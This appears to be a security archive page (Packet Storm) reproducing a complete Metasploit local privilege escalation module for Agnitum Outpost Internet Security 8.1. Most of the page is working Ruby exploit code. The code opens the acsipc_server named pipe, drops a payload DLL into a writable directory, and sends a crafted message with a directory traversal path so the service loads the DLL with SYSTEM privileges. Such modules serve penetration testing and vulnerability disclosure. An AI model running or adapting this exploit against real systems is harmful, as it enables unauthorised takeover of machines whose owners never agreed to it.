what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Agnitum Outpost Internet Security Local Privilege Escalation

Agnitum Outpost Internet Security Local Privilege Escalation
Posted Sep 17, 2013
Authored by juan vazquez, Ahmad Moghimi | Site metasploit.com

This Metasploit module exploits a directory traversal vulnerability on Agnitum Outpost Internet Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary code with SYSTEM privileges. This Metasploit module has been tested successfully on Windows 7 SP1 with Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).

tags | exploit, arbitrary
systems | windows
advisories | OSVDB-96208
SHA-256 | c725a9edfaf376428bc599d7a1561e16694e97bcddedbb8f573cc30689f520c3

Agnitum Outpost Internet Security Local Privilege Escalation

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info, {
'Name' => 'Agnitum Outpost Internet Security Local Privilege Escalation',
'Description' => %q{
This module exploits a directory traversal vulnerability on Agnitum Outpost Internet
Security 8.1. The vulnerability exists in the acs.exe component, allowing the user to load
load arbitrary DLLs through the acsipc_server named pipe, and finally execute arbitrary
code with SYSTEM privileges. This module has been tested successfully on Windows 7 SP1 with
Agnitum Outpost Internet Security 8.1 (32 bits and 64 bits versions).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ahmad Moghimi', # Vulnerability discovery
'juan vazquez' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'Privileged' => true,
'Targets' =>
[
[ 'Agnitum Outpost Internet Security 8.1', { } ],
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'References' =>
[
[ 'OSVDB', '96208' ],
[ 'EDB', '27282' ],
[ 'URL', 'http://mallocat.com/a-journey-to-antivirus-escalation/' ]
],
'DisclosureDate' => 'Aug 02 2013',
'DefaultTarget' => 0
}))

register_options([
# It is OptPath becuase it's a *remote* path
OptString.new("WritableDir", [ false, "A directory where we can write files (%TEMP% by default)" ]),
# By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
OptInt.new("DEPTH", [ true, "Traversal depth", 3 ])
], self.class)


end

def junk
return rand_text_alpha(4).unpack("V").first
end

def open_named_pipe(pipe)
invalid_handle_value = 0xFFFFFFFF

r = session.railgun.kernel32.CreateFileA(pipe, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL", 0)

handle = r['return']

if handle == invalid_handle_value
return nil
end

return handle
end

def write_named_pipe(handle, dll_path, dll_name)

traversal_path = "..\\" * datastore["DEPTH"]
traversal_path << dll_path.gsub(/^[a-zA-Z]+:\\/, "")
traversal_path << "\\#{dll_name}"

path = Rex::Text.to_unicode(traversal_path)

data = "\x00" * 0x11
data << path
data << "\x00\x00"
data << "\x00\x00\x00"

buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack("V*") # GUID common_handler
buf << [0x17].pack("V") # command
buf << [junk].pack("V")
buf << [data.length].pack("V")
buf << [0, 0, 0].pack("V*")
buf << data

w = client.railgun.kernel32.WriteFile(handle, buf, buf.length, 4, nil)

if w['return'] == false
print_error("The was an error writing to disk, check permissions")
return nil
end

return w['lpNumberOfBytesWritten']
end


def check
handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
if handle.nil?
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
return Exploit::CheckCode::Detected
end

def exploit

temp_dir = ""

print_status("Opening named pipe...")
handle = open_named_pipe("\\\\.\\pipe\\acsipc_server")
if handle.nil?
fail_with(Failure::NoTarget, "\\\\.\\pipe\\acsipc_server named pipe not found")
else
print_good("\\\\.\\pipe\\acsipc_server found! Proceeding...")
end

if datastore["WritableDir"] and not datastore["WritableDir"].empty?
temp_dir = datastore["WritableDir"]
else
temp_dir = expand_path("%TEMP%")
end

print_status("Using #{temp_dir} to drop malicious DLL...")
begin
cd(temp_dir)
rescue Rex::Post::Meterpreter::RequestError
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Config, "Failed to use the #{temp_dir} directory")
end

print_status("Writing malicious DLL to remote filesystem")
write_path = pwd
dll_name = "#{rand_text_alpha(10 + rand(10))}.dll"
begin
# Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
write_file(dll_name, generate_payload_dll)
register_file_for_cleanup("#{write_path}\\#{dll_name}")
rescue Rex::Post::Meterpreter::RequestError
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Config, "Failed to drop payload into #{temp_dir}")
end

print_status("Exploiting through \\\\.\\pipe\\acsipc_server...")
bytes = write_named_pipe(handle, write_path, dll_name)
session.railgun.kernel32.CloseHandle(handle)

if bytes.nil?
fail_with(Failure::Unknown, "Failed while writing to \\\\.\\pipe\\acsipc_server")
end

end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close